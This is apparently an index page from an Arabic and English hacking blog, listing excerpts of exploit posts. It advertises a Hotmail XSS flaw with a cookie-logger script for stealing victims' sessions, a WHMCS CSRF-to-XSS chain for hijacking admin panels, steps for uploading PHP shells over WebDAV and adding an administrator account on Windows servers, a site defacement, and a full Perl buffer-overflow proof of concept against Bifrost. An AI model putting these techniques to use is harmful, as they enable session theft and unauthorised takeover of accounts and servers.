Share

[0dAy] Hotmail XSS Vuln. Exploitation to cookies logging [عربى]

السلام عليكم

شرح ثغرة فى هوتميل من نوع

xss

حتى الحصول على الكوكيز الخاص بالضحية

الثغرة من اكتشاف الحربى

الاستغلال والشرح بواسطة فارس

كل ما ستحتاجه هو السكربت الخاص بتخزين الكوكيز

http://pastebin.com/mZCMRcGC

[0dAy] Hotmail XSS Vuln. Exploitation to cookies logging [English]

Hi all,

today i made a quick video tut for anew 0day Hotmail xss vuln.

Vuln By : al74arbi

Exploited By : faris

all you need is the cookie logger script

u can get it from here

http://pastebin.com/mZCMRcGC

whmcs Exploit Csrf to xss to Get Co okie to log in panel

السلام عليكم ورحمة الله وبركاته

الموضوع الجزء الثاني
whmcs Exploit Csrf to xss to Get Co okie to log in panel

الجزء الاول

http://1337r1z.wordpress.com/2011/06/24/whmcs-exploit-csrf-to-xss-to-get-cookie/
لثغرة whmcs

whmcs Exploit Csrf to xss to Get cookie

السلام عليكم ورحمة الله وبركاته

بعد نشر الثغره .. من احد الاصدقاء الله يهديه بس


حبيت انزلها حصريه لترياق وحرس ومدونتنا


الثغره في ملف admin


لاكن استغليتها بشكل خطير باذن الله يعجبكم يااسود السنه


واحلى دعس على الداتا سنترات


الثغره من اكتشافي لها شهر ويشهد الله ..!!


راح اشرحها لكم حبه حبه


Hackers Underground Training 2011 (Ebook + Video)



The Hacker’s Underground Training will guide you through password hacking, windows hacking, malware, phising, web hacking, network hacking and Linux (intro, installation, etc). All this material fully packed with images, thus being a top step-by-step guide, on the course of which you cannot fail.

Dev-Point hacked by The Injector

Hi all
Dev-point forums was defaced today via The Injector

Get Full access on winservers Via SuExploit and WebDav

Hi all



an old tut in which we will get full access on windows server


 - uploading php shell via webdav


 - bypassing server's security via su exploit


 - add our own user and password with administrator priv.


 - Connect to the server via remote desktop


HTTP hEadEr sPliTTeR [ pl ]

small ugly code to get the http header


usage  perl sec.pl hostname


Demo


sh-3.2# perl head.pl pastebin.com


pastebin.com runs nginx/0.8.52

Advanced PHP Redirector

السلام عليكم


فى كتير من الاوقات بيكون عندك منتدى ويكون ما شاء الله شغال واعضائه كتار


ومواضيع شغاله فى جوجل زى الحلاوه


لكن تيجى فى وقت تغير الدومين


او مسار المنتدى


بدل ما هو


إعتذار واجب

السلام عليكم


إزى الحال يا شباب


الموضوع ده مش درس ولا حاجه


مجرد حبيت اعتذر لناس حاسس انى فعلا غلطت فى حقهم


فى الفتره الاخيره اللى هى اخر شهر ونص تقريبا


Secure Your b0x From Autoplay Viruses :)

Hello Guy'z


We're Talking About Autorun/Autoplay Viruses .. We Know That's Very Noisy Virus


Download Video


MediaFire : http://www.mediafire.com/?kot1r6blf8fbkm0


Multiupload : http://www.multiupload.com/KC4X1MSNIY


./b0x-j0 | 1337-r1z


ReadFile Func To SQL Query'z And Upload Shell In Win32 Serv'z

Hello Brother'z


We're Talking About Readfile Function in php .. We Want To Upload shell into Server


.. So I've an Idea To Connect With SQL And make SQL Query


To Download Video


Upload-Readfile.rar


1337-r1z | b0x-j0

WHMCS v4.x.x Full Path Disclosure Extract User ( .pl )

السلام عليكم ورحمة الله وبركاته ..

شرح







 

الاداه

 

http://trav1an.t35.com/WHMCS%20v4.x.x%20Full%20Path%20Disclosure%20Extract%20User.pl

 

طبعا انا مشفره لشل كود

السبب حفظ الطريقه وعملها من الاداه

(;

Bypass account lockout in MSN

So you're frozen by some skidnut I'm guessing?, big deal... I'll teach you how to protect yourself and login while being frozen.

1. To login while you're frozen visit this link:

Bifrost v1.2.1d.exe Local buffer PoC

#!/usr/bin/perl
#########################################################
# Title : This PoC For Local buffer Bifrost v1.2.1d.exe
# Author : Or4nG.M4n
# Home : cc.7rs.org | tryag.cc | v4-team.com
# Email : priv8te@hotmail.com
# Date : n\a
# Tested on : indows XP SP3 Professional Edition
#########################################################
# My Blog : or4ng3m4n.blogspot.com & 1337r1z.wordpress.com
# Thks to : Dev!L FuCkEr , xsS mAn , sA^Dev!L , SarBoT511
# Greetz : i-Hmx , Fox , Z1d , Lagripe-dz , 7rs.org Member
print q(
anti.virus.team | Or4
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
in the name of /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
);
$x = "\x41" x 2500;
$header = "\x42\x69\x66\x72\x6F\x73\x74\x53\x65\x74\x74\x69\x6E\x67\x73\x00\x31\x32\x37\x2E\x30\x2E\x30\x2E\x31";
open(File, '>>test.set');
print File $header.$x;
close(File);

# For : [Lammer Bifrost] kidz ..

هذا اكتشاف لاطفال البيفروست هديه
http://1337day.com/exploits/16241
(;